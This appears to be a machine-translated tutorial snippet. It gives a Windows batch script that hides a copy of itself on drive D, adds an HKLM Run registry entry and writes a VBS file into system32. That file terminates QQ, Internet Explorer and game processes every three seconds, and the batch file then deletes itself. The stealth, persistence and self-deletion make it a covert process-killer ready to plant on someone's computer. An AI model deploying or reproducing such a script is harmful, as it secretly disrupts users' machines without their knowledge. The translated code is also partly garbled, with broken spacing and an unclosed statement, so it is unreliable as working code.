After running, the Jk.vbs is generated in the%windir%\system32\ directory,
and the registry startup entry is automatically added, and a jk.vbs of hidden attributes is generated in d:\.
3-second interval monitoring process, if the process has QQ.exe, iexplore.exe, client.exe, Game.exe process will automatically end the process.
Copy Code code as follows:
@echo off
Attrib-s-h-a-R d:\jk.bat 1>nul 2>nul
If exist D:\jk.bat del d:\jk.bat/q
Copy%0 d:\jk.bat/y >nul
attrib +s +h +a +r d:\jk.bat
If exist%windir%\system32\jk.vbs del%windir%\system32\jk.vbs
echo y|reg add hklm\software\microsoft\windows\currentversion\run/v data/t reg_sz/d c:\windows\system32\jk.vbs > Nul
Echo Do>>%windir%\system32\jk.vbs
Echo Wscript.Sleep 3000>>%windir%\system32\jk.vbs
echo StrComputer = "." >>%windir%\system32\jk.vbs
echo Set objWMIService = GetObject ("winmgmts:\\" ^& strComputer ^& "\root\cimv2") >>%windir%\system32\ Jk.vbs
echo Set colitems = objWMIService.ExecQuery (_>>%windir%\system32\jk.vbs
echo "SELECT * from Win32_Process", >>%windir%\system32\jk.vbs
echo for each objitem in colitems >>%windir%\system32\jk.vbs
echo If objitem.name= "QQ.exe" or objitem.name= "Iexplore.exe" or _>>%windir%\system32\jk.vbs
echo objitem.name= "client.exe" Or objitem.name= "Game.exe" _>>%windir%\system32\jk.vbs
Echo Then objitem. Terminate () >>%windir%\system32\jk.vbs
Echo Next>>%windir%\system32\jk.vbs
Echo Loop>>%windir%\system32\jk.vbs
Start%windir%\system32\jk.vbs
Del%0/q
